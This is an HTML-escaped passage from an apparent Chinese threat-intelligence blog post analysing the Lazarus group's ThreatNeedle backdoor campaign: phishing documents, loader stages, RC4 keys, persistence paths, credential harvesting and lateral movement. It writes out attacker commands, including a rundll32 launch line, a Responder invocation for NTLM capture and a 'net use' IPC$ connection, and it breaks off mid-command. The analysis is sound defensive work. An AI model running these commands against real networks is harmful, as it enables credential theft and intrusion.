http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0a5c6ff4a911159517dda27795d5ef89-10-585x379.png 585w\" sizes=\"auto, (max-width: 610px) 100vw, 610px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u8be5\u6587\u4ef6\u5305\u542b\u4eba\u53e3\u5065\u5eb7\u8bc4\u4f30\u9879\u76ee\u7684\u4fe1\u606f\uff0c\u8fd9\u5374\u4e0e\u9493\u9c7c\u90ae\u4ef6\u7684\u4e3b\u9898\u6ca1\u6709\u76f4\u63a5\u5173\u7cfb:<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-796\" title=\"0e164d0abc29d7a03dcbda7dad9fdc2a\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a.png\" alt=\"0e164d0abc29d7a03dcbda7dad9fdc2a\" width=\"620\" height=\"463\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a.png 1206w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-768x573.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-1170x873.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/0e164d0abc29d7a03dcbda7dad9fdc2a-585x437.png 585w\" sizes=\"auto, (max-width: 620px) 100vw, 620px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">Word\u6587\u6863\u4e2d\u5305\u542b\u6076\u610f\u5b8f\u4ee3\u7801\uff0c\u4f5c\u7528\u662f\u4e0b\u8f7d\u548c\u6267\u884c\u771f\u6b63\u7684\u6076\u610f\u7a0b\u5e8f\u3002\u4f46\u6700\u521d\u7684\u9493\u9c7c\u5c1d\u8bd5\u6ca1\u6709\u6210\u529f\uff0c\u539f\u56e0\u662f\u76ee\u6807\u7cfb\u7edf\u7684\u5fae\u8f6fOffice\u5b89\u88c5\u4e2d\u7684\u5b8f\u88ab\u7981\u7528\u3002\u4e3a\u4e86\u8bf4\u670d\u76ee\u6807\u5141\u8bb8\u6076\u610f\u5b8f\uff0c\u653b\u51fb\u8005\u53d1\u9001\u4e86\u53e6\u4e00\u5c01\u90ae\u4ef6\uff0c\u8bf4\u660e\u5982\u4f55\u5728\u5fae\u8f6fOffice\u4e2d\u542f\u7528\u5b8f\uff0c\u4f46\u653b\u51fb\u8005\u5728\u8bed\u8a00\u63cf\u8ff0\u4e0a\u51fa\u73b0\u5f88\u591a\u8bed\u6cd5\u9519\u8bef\uff0c\u8fd9\u8868\u660e\u4ed6\u4eec\u53ef\u80fd\u4e0d\u662f\u4ee5\u4fc4\u8bed\u4e3a\u6bcd\u8bed\u7684\u4eba\uff0c\u800c\u662f\u4f7f\u7528\u4e86\u7ffb\u8bd1\u5de5\u5177\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-797\" title=\"80916f0d1830162bceb45587611183a3\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3.png\" alt=\"80916f0d1830162bceb45587611183a3\" width=\"648\" height=\"416\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3.png 1426w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-768x492.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-1170x750.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/80916f0d1830162bceb45587611183a3-585x375.png 585w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">2020\u5e746\u67083\u65e5\uff0c\u5176\u4e2d\u4e00\u4e2a\u6076\u610f\u9644\u4ef6\u88ab\u5458\u5de5\u6253\u5f00\uff0c\u653b\u51fb\u8005\u83b7\u5f97\u4e86\u5185\u7f51\u7684\u4e00\u4e2a\u9a7b\u70b9\u3002\u5a01\u80c1\u8005\u5728\u8fdc\u63a7\u6210\u529f\u540e\u4ece\u786c\u76d8\u4e0a\u62b9\u53bb\u4e86word\u542f\u52a8\u8fdc\u63a7\u65f6\u4ea7\u751f\u7684\u4e34\u65f6\u6587\u4ef6\uff0c\u8fd9\u610f\u5473\u7740\u5b83\u4eec\u65e0\u6cd5\u88ab\u83b7\u5f97\u3002 \u5c3d\u7ba1\u5982\u6b64\uff0c\u6839\u636e\u6211\u4eec\u7684\u9065\u6d4b\uff0c\u8fd8\u662f\u68c0\u7d22\u5230\u4e86\u4e00\u4e2a\u4e0e\u6b64word\u9493\u9c7c\u76f8\u5173\u7684\u53e6\u4e00\u4e2a\u9493\u9c7c\u6587\u6863\uff0c\u8fd9\u4e2a\u9065\u6d4b\u51fa\u6765\u7684\u9493\u9c7c\u6587\u6863\u662f\u5173\u4e8e\u53d1\u7535\u673a\/\u7535\u529b\u884c\u4e1a\u5de5\u7a0b\u5e08\u7684\u5c97\u4f4d\u63cf\u8ff0\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-798\" title=\"8fd0e59814de2ea1ce55ea7819a6268d\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d.png\" alt=\"8fd0e59814de2ea1ce55ea7819a6268d\" width=\"619\" height=\"428\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d.png 1354w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-768x531.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-1170x809.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8fd0e59814de2ea1ce55ea7819a6268d-585x404.png 585w\" sizes=\"auto, (max-width: 619px) 100vw, 619px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u5b83\u521b\u5efa\u4e86\u4e00\u4e2a\u6709\u6548\u8f7d\u8377\u548c\u5feb\u6377\u65b9\u5f0f\u6587\u4ef6\uff0c\u7136\u540e\u901a\u8fc7\u4f7f\u7528\u547d\u4ee4\u884c\u53c2\u6570\u7ee7\u7eed\u6267\u884c\u6709\u6548\u8f7d\u8377\uff1a<\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-K7OMVONY\">\u8fd9\u91cc\u4eceword\u9493\u9c7c\u5230\u8fdc\u63a7\u4e3b\u8fdb\u7a0b\u542f\u52a8\u73af\u8282\u4ecd\u7136\u6709\u7f3a\u5931\uff0c\u4f46\u63a8\u6d4b\u662f\u8fdc\u7a0bdll\u4e0b\u8f7d\uff0c\u7136\u540erundll32\u542f\u52a8dll\u6587\u4ef6\uff0c\u8fd9\u4e2adll\u5c31\u662fThreatNeedle\u540e\u95e8\u7684\u542f\u52a8\u5668\uff0c\u4f30\u8ba1\u662f\u4e2ashellcode_loader\uff0c\u786c\u7f16\u7801\u7684\u53c2\u6570\u662f\u4e3a\u4e86\u4f20\u53c2\u7ed5\u8fc7\u6c99\u7bb1\u68c0\u6d4b\u3002LNK\u5199\u5165\u5230\u542f\u52a8\u76ee\u5f55\u505a\u6301\u4e45\u5316\uff0c\u5176\u4e2dLNK\u7684\u542f\u52a8\u53c2\u6570\u4e5f\u5e94\u8be5\u662frundll32\u7684\u547d\u4ee4\u884c\u3002<\/p>\n<\/blockquote>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">\u2022 Payload\u8def\u5f84: %APPDATA%\\Microsoft\\Windows\\lconcaches.db\r\n\u2022 LNK\u6587\u4ef6\u8def\u5f84: %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\OneDrives.lnk\r\n\u2022 \u547d\u4ee4\u884c\uff0cplease note that the string at the end is hard-coded, but different for each sample\uff08\u8bf7\u6ce8\u610f\uff0c\u7ed3\u5c3e\u7684\u5b57\u7b26\u4e32\u662f\u786c\u7f16\u7801\u7684\uff0c\u4f46\u6bcf\u4e2a\u6837\u672c\u90fd\u4e0d\u540c\uff09:\r\no rundll32.exe [dllpath],Dispatch n2UmQ9McxUds2b29<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-akoBMReL\"><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81C2%E7%A8%8B%E5%BA%8F%E6%9C%AC%E5%9C%B0%E6%A4%8D%E5%85%A5%E6%B5%81%E7%A8%8B\"><\/span>\u4e8c\u3001C2\u7a0b\u5e8f\u672c\u5730\u690d\u5165\u6d41\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u672c\u5730\u542f\u52a8\u5230\u690d\u5165\u6d41\u7a0b\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-799\" title=\"b93b5525c619e61d526df57e60eaf765\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765.png\" alt=\"b93b5525c619e61d526df57e60eaf765\" width=\"1646\" height=\"750\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765.png 1646w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-768x350.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-1536x700.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-1170x533.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b93b5525c619e61d526df57e60eaf765-585x267.png 585w\" sizes=\"auto, (max-width: 1646px) 100vw, 1646px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-lU3Worvs\"><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81ThreatNeedle%E5%AE%89%E8%A3%85%E5%99%A8%EF%BC%88Installer%EF%BC%89\"><\/span>\u4e09\u3001ThreatNeedle\u5b89\u88c5\u5668\uff08Installer\uff09<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u8fc7\u7a0b\u4e3b\u8981\u76ee\u7684\uff0c\u7ed5\u6c99\u7bb1\uff0c\u672c\u5730\u6587\u4ef6copy\uff0c\u9690\u533f\u81ea\u8eab\uff0c\u4ee5\u53ca\u901a\u8fc7\u7cfb\u7edf\u670d\u52a1\u6301\u4e45\u5316\u3002<\/p><\/blockquote>\n<p data-diff-id=\"ct-diff-id-R41pmeSK\">\u542f\u52a8\u540e\uff0c\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528RC4\u89e3\u5bc6\u4e00\u4e2a\u5d4c\u5165\u5f0f\u5b57\u7b26\u4e32\uff08\u5bc6\u94a5\uff1aB6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73 89 C1 D2 C4\uff09\u5e76\u5c06\u5176\u4e0e &#8220;7486513879852 &#8220;\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c \u7528\u6237\u5728\u6ca1\u6709\u547d\u4ee4\u884c\u53c2\u6570\u7684\u60c5\u51b5\u4e0b\u6267\u884c\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u4f1a\u542f\u52a8\u4e00\u4e2a\u5408\u6cd5\u7684\u8ba1\u7b97\u5668\u3002 \u5728\u611f\u67d3\u8fc7\u7a0b\u4e2d\uff0c\u6076\u610f\u8f6f\u4ef6\u4ecenetsvc\u4e2d\u968f\u673a\u9009\u62e9\u4e86\u4e00\u4e2a\u670d\u52a1\u540d\u79f0\uff0c\u4ee5\u4fbf\u5c06\u5176\u7528\u4e8e\u6709\u6548\u8f7d\u8377\u521b\u5efa\u8def\u5f84\u3002\u7136\u540e\uff0c\u6076\u610f\u8f6f\u4ef6\u5728\u7cfb\u7edf\u6587\u4ef6\u5939\u4e2d\u521b\u5efa\u4e00\u4e2a\u540d\u4e3abcdbootinfo.tlp\u7684\u6587\u4ef6\uff0c\u5176\u4e2d\u5305\u542b\u611f\u67d3\u65f6\u95f4\u548c\u968f\u673a\u9009\u62e9\u7684\u670d\u52a1\u540d\u79f0\u3002\u6211\u4eec\u53d1\u73b0\uff0c \u6076\u610f\u8f6f\u4ef6\u64cd\u4f5c\u8005\u68c0\u67e5\u8fd9\u4e2a\u6587\u4ef6\uff0c\u4ee5\u4e86\u89e3\u8fdc\u7a0b\u4e3b\u673a\u662f\u5426\u88ab\u611f\u67d3\uff0c\u5982\u679c\u88ab\u611f\u67d3\uff0c\u5219\u611f\u67d3\u53d1\u751f\u7684\u65f6\u95f4\u3002 \u7136\u540e\uff0c\u5b83\u4f7f\u7528RC4\u7b97\u6cd5\u5bf9\u5d4c\u5165\u7684\u6709\u6548\u8f7d\u8377\u8fdb\u884c\u89e3\u5bc6\uff0c\u5c06\u5176\u4fdd\u5b58\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u968f \u673a\u521b\u5efa\u7684\u4e94\u5b57\u7b26\u6587\u4ef6\u540d\u7684.xml\u6269\u5c55\u540d\u4e2d\uff0c\u7136\u540e\u5c06\u5176\u590d\u5236\u5230\u6269\u5c55\u540d\u4e3a.sys\u7684\u7cfb\u7edf\u6587\u4ef6\u5939\u4e2d\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-rsSWdYqS\">\u8fd9\u6700\u540e\u7684\u6709\u6548\u8f7d\u8377\u662f\u5728\u5185\u5b58\u4e2d\u8fd0\u884c\u7684ThreatNeedle\u52a0\u8f7d\u5668\u3002\u6b64\u65f6\uff0c\u52a0\u8f7d\u5668\u4f7f\u7528\u4e0d\u540c\u7684RC4\u5bc6\u94a5\uff083D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20\uff09\uff0c\u843d\u5730\u7684\u6076\u610f\u8f6f\u4ef6\u88ab\u6ce8\u518c\u4e3a\u4e00\u4e2aWindows\u670d\u52a1\u5e76\u542f\u52a8\u3002\u6b64\u5916\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u5c06\u914d\u7f6e\u6570\u636e\u4fdd\u5b58\u4e3a\u7528RC4\u52a0\u5bc6\u7684\u6ce8\u518c\u8868\u5bc6\u94a5\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig- Description<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-70RQvkR4\"><span class=\"ez-toc-section\" id=\"%E5%9B%9B%E3%80%81ThreatNeedle%E5%8A%A0%E8%BD%BD%E5%99%A8%EF%BC%88loader%EF%BC%89\"><\/span>\u56db\u3001ThreatNeedle\u52a0\u8f7d\u5668\uff08loader\uff09<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u8fc7\u7a0b\u4e3b\u8981\u89e3\u5bc6\u8f7d\u8377\uff0c\u5e76\u901a\u8fc7shellcode_loader\u65b9\u5f0f\u5c06\u771f\u6b63\u7684\u8fdc\u63a7\u8f7d\u8377\u4ece\u5185\u5b58\u4e2d\u76f4\u63a5\u52a0\u8f7d\u8d77\u6765\u3002<\/p><\/blockquote>\n<p>\u8be5\u7ec4\u4ef6\u8d1f\u8d23\u5c06\u6700\u7ec8\u7684\u540e\u95e8\u6709\u6548\u8f7d\u8377\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u3002\u4e3a\u4e86\u505a\u5230\u8fd9\u4e00\u70b9\uff0c\u8be5\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528\u51e0\u79cd\u6280\u672f\u6765\u89e3\u5bc6\u5176\u6709\u6548\u8f7d\u8377\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">- \u4ece\u6ce8\u518c\u8868\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002 \r\n- \u5728\u89e3\u5bc6RC4\u548c\u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002 \r\n- \u5728\u89e3\u5bc6AES\u548c\u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002\r\n- \u89e3\u538b\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002\r\n- \u5728\u4e00\u5b57\u8282XOR\u540e\u4ece\u81ea\u8eab\u52a0\u8f7d\u6709\u6548\u8f7d\u8377\u3002<\/pre>\n<p>\u5927\u591a\u6570\u52a0\u8f7d\u5668\u5f0f\u7684\u6076\u610f\u8f6f\u4ef6\u7c7b\u578b\u68c0\u67e5\u547d\u4ee4\u884c\u53c2\u6570\uff0c\u53ea\u6709\u5728\u7ed9\u51fa\u9884\u671f\u53c2\u6570\u65f6\u624d\u8fd0\u884c\u6076\u610f\u7a0b\u5e8f\u3002\u8fd9\u662fThreatNeedle\u52a0\u8f7d\u5668\u7684\u4e00\u4e2a\u5171\u540c\u7279\u5f81\u3002\u6211\u4eec\u770b\u5230\u7684\u6700\u5e38\u89c1\u7684\u4f8b\u5b50 \u4e0eThreatNeedle\u5b89\u88c5\u7a0b\u5e8f\u7c7b\u4f3c\uff0c\u6076\u610f\u8f6f\u4ef6\u4f7f\u7528RC4\u89e3\u5bc6\u4e00\u4e2a\u5d4c\u5165\u5f0f\u5b57\u7b26\u4e32\uff0c\u5e76\u5728\u542f\u52a8\u65f6\u4e0e\u53c2\u6570 &#8220;Sx6BrUk4v4rqBFBV &#8220;\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c\u5339\u914d\uff0c\u6076\u610f\u8f6f\u4ef6\u5f00\u59cb\u4f7f\u7528\u76f8 \u540c\u7684RC4\u5bc6\u94a5\u89e3\u5bc6\u5176\u5d4c\u5165\u5f0f\u6709\u6548\u8f7d\u8377\u3002\u89e3\u5bc6\u540e\u7684\u6709\u6548\u8f7d\u8377\u662f\u4e00\u4e2a\u6863\u6848\u6587\u4ef6\uff0c\u968f\u540e\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u88ab\u89e3\u538b\u7f29\u3002\u6700\u7ec8\uff0cThreatNeedle\u6076\u610f\u8f6f\u4ef6\u5728\u5185\u5b58\u4e2d\u751f\u6210\u3002 \u88c5\u8f7d\u5668\u7684\u53e6\u4e00\u4e2a\u53d8\u4f53\u6b63\u5728\u4ece\u53d7\u5bb3\u8005\u7684\u6ce8\u518c\u8868\u4e2d\u51c6\u5907\u4e0b\u4e00\u9636\u6bb5\u7684\u6709\u6548\u8f7d\u8377\u3002\u6b63\u5982\u6211\u4eec\u4ece\u5b89\u88c5\u7a0b\u5e8f\u7684\u6076\u610f\u8f6f\u4ef6\u63cf\u8ff0\u4e2d\u770b\u5230\u7684\uff0c\u6211\u4eec\u6000\u7591\u6ce8\u518c\u8868\u952e\u662f\u7531\u5b89\u88c5\u7a0b\u5e8f\u7ec4\u4ef6\u521b\u5efa\u7684\u3002\u4ece\u6ce8\u518c\u8868\u4e2d\u83b7\u53d6\u7684\u6570\u636e\u4f7f\u7528RC4\u8fdb\u884c\u89e3\u5bc6\uff0c\u7136\u540e\u8fdb\u884c\u89e3\u538b\u7f29\u3002 \u6700\u7ec8\uff0c\u5b83\u88ab\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u5e76\u8c03\u7528\u5bfc\u51fa\u529f\u80fd\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e94\u3001ThreatNeedle\u540e\u95e8\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-WDKnNsOR\"><span class=\"ez-toc-section\" id=\"%E4%BA%94%E3%80%81ThreatNeedle%E5%90%8E%E9%97%A8\"><\/span>\u4e94\u3001ThreatNeedle\u540e\u95e8<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u5185\u5b58\u4e2d\u6267\u884c\u7684\u6700\u7ec8\u6709\u6548\u8f7d\u8377\u624d\u662f\u5b9e\u9645\u7684ThreatNeedle\u540e\u95e8\uff0c\u5b83\u6709\u4ee5\u4e0b\u529f\u80fd\u6765\u63a7\u5236\u53d7\u611f\u67d3\u7684\u673a\u5668\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">- \u64cd\u4f5c\u6587\u4ef6\/\u76ee\u5f55\r\n- \u7cfb\u7edf\u4fe1\u606f\u6536\u96c6 \r\n- \u63a7\u5236\u540e\u95e8\u8fdb\u7a0b \r\n- \u8fdb\u5165\u7761\u7720\u6216\u4f11\u7720\u6a21\u5f0f \r\n- \u66f4\u65b0\u540e\u95e8\u914d\u7f6e \r\n- \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-kS2vEyr4\"><span class=\"ez-toc-section\" id=\"%E5%85%AD%E3%80%81%E5%90%8E%E5%88%A9%E7%94%A8%E9%98%B6%E6%AE%B5\"><\/span>\u516d\u3001\u540e\u5229\u7528\u9636\u6bb5<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u5176\u4e2d\u4e00\u53f0\u4e3b\u673a\u4e0a\uff0c\u6211\u4eec\u53d1\u73b0\u8be5\u653b\u51fb\u8005\u6267\u884c\u4e86\u4e00\u4e2a\u540d\u4e3a<a class=\"ct-link\" href=\"https:\/\/github.com\/lgandx\/Responder\/\" target=\"_blank\" rel=\"noopener\" data-auto_update=\"0\">Responder<\/a>\u7684\u51ed\u8bc1\u91c7\u96c6\u5de5\u5177\uff0c\u5e76\u4f7f\u7528Windows\u547d\u4ee4\u6a2a\u5411\u79fb\u52a8\u3002Lazarus\u7a81\u7834\u4e86\u5185\u7f51\u7f51\u7edc\u9694\u79bb\u7b56\u7565\uff0c\u662f\u901a\u8fc7\u5165\u4fb5\u4e00\u4e2a\u865a\u62df\u8def\u7531\u5668\uff0c\u4ece\u4e00\u4e2a\u4e0e\u4e92\u8054\u7f51\u5b8c\u5168\u9694\u79bb\u7684\u7f51\u6bb5\u4e2d\u7a83\u53d6\u4e86\u6570\u636e\uff0c\u4e0b\u9762\u662f\u8c03\u67e5\u5230\u7684\u5927\u81f4\u65f6\u95f4\u7ebf\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-800\" title=\"84e1dca5ab84964b8845a333da6ed64e\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e.png\" alt=\"84e1dca5ab84964b8845a333da6ed64e\" width=\"1698\" height=\"986\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e.png 1698w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-768x446.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-1536x892.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-1170x679.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/84e1dca5ab84964b8845a333da6ed64e-585x340.png 585w\" sizes=\"auto, (max-width: 1698px) 100vw, 1698px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e03\u3001\u51ed\u636e\u6536\u96c6\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-yk6ZOEhY\"><span class=\"ez-toc-section\" id=\"%E4%B8%83%E3%80%81%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86\"><\/span>\u4e03\u3001\u51ed\u636e\u6536\u96c6<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u5728\u8c03\u67e5\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0Responder\u5de5\u5177\u662f\u4ece\u6536\u5230\u9c7c\u53c9\u5f0f\u7f51\u7edc\u9493\u9c7c\u6587\u4ef6\u7684\u5176\u4e2d \u4e00\u53f0\u53d7\u5bb3\u8005\u673a\u5668\u4e0a\u6267\u884c\u7684\u3002\u5728\u6700\u521d\u611f\u67d3\u540e\u7684\u4e00\u5929\uff0c\u6076\u610f\u8f6f\u4ef6\u64cd\u4f5c\u8005\u5c06\u8be5\u5de5\u5177\u653e \u5728\u8be5\u4e3b\u673a\u4e0a\uff0c\u5e76\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u6267\u884c\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">[Responder file path] -i [IP address] -rPv\r\n\r\n\u9644\u4e0a\u53c2\u6570\u89e3\u91ca\uff1a\r\n-r, --wredir          Enable answers for netbios wredir suffix queries.\r\n                      Answering to wredir will likely break stuff on the\r\n                      network. Default: Off\r\n-P, --ProxyAuth       Force NTLM (transparently)\/Basic (prompt) \r\n                      authentication for the proxy. WPAD doesn't need to\r\n                      be ON. This option is highly effective when combined\r\n                      with -r. Default: Off\r\n-v, --verbose         Increase verbosity.<\/pre>\n<blockquote><p>\u4eceresponder\u5230\u83b7\u53d6\u5230\u67d0\u53f0server\u51ed\u636e\u4e2d\u95f4\u6709\u7f3a\u5931\u7ec6\u8282\uff0c\u4e24\u79cd\u53ef\u80fd\uff0c1\u3001\u672c\u5730\u51ed\u636e\u548c\u8fdc\u7a0bserver\u4e00\u81f4\uff0c\u4f7f\u7528mimikatz\u4e4b\u7c7b\u7684\u5de5\u5177\u5bfc\u51fa\u4e86\u51ed\u636e\u30022\u3001\u5f3a\u5236server\u53d1\u8d77\u4e86\u5bf9\u653b\u51fb\u8005\u7684\u8ba4\u8bc1\uff0cresponder\u83b7\u53d6\u5230NetNTLMHash\u540e\uff0c\u79bb\u7ebf\u4f7f\u7528hashcat\u7834\u89e3\u51fa\u660e\u6587\u5bc6\u7801\u3002\u4ece\u6a2a\u5411\u79fb\u52a8\u73af\u8282\u53ef\u4ee5\u770b\u51fa\uff0c\u83b7\u53d6\u5230\u7684\u662f\u660e\u6587\u5bc6\u7801\u3002<\/p><\/blockquote>\n<p>\u51e0\u5929\u540e\uff0c\u653b\u51fb\u8005\u5f00\u59cb\u4ece\u8be5\u4e3b\u673a\u6a2a\u5411\u79fb\u52a8\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u8bc4\u4f30\u653b\u51fb\u8005\u6210\u529f\u5730\u4ece\u8be5\u4e3b\u673a\u83b7\u5f97\u4e86\u767b\u5f55\u51ed\u8bc1\uff0c\u5e76\u5f00\u59cb\u4f7f\u7528\u5b83\u4eec\u8fdb\u884c\u8fdb\u4e00\u6b65\u7684\u6076\u610f\u6d3b\u52a8\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u516b\u3001\u6a2a\u5411\u79fb\u52a8\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-u3rjdYRC\"><span class=\"ez-toc-section\" id=\"%E5%85%AB%E3%80%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8\"><\/span>\u516b\u3001\u6a2a\u5411\u79fb\u52a8<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p>\u6b64\u5904\u7f3a\u5931\u6bcf\u53f0server\u662f\u5426\u90fd\u662f\u76f8\u540c\u7684\u6a2a\u5411\u79fb\u52a8\u65b9\u5f0f\uff0c\u6682\u4e14\u8ba4\u4e3a\u51ed\u636e\u90fd\u76f8\u540c\uff0c\u6216\u5229\u7528\u65b9\u5f0f\u76f8\u540c\u3002<\/p><\/blockquote>\n<p>\u5728\u83b7\u5f97\u767b\u5f55\u51ed\u8bc1\u540e\uff0c\u8be5\u884c\u4e3a\u4eba\u5f00\u59cb\u4ece\u5de5\u4f5c\u7ad9\u6a2a\u5411\u79fb\u52a8\u5230\u670d\u52a1\u5668\u4e3b\u673a\u3002\u91c7\u7528\u4e86\u5178\u578b\u7684\u6a2a\u5411\u79fb\u52a8\u65b9\u6cd5\uff0c\u4f7f\u7528Windows\u547d\u4ee4\u3002\u9996\u5148\uff0c\u4f7f\u7528 &#8220;net use &#8220;\u547d\u4ee4\u4e0e\u8fdc\u7a0b\u4e3b\u673a\u5efa\u7acb\u7f51\u7edc\u8fde\u63a5\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">net use \\\\[IP address]\\IPC$ \"[password]\" \/u:\"[user name]\" &gt; $temp\\~tmp5936t.tmp 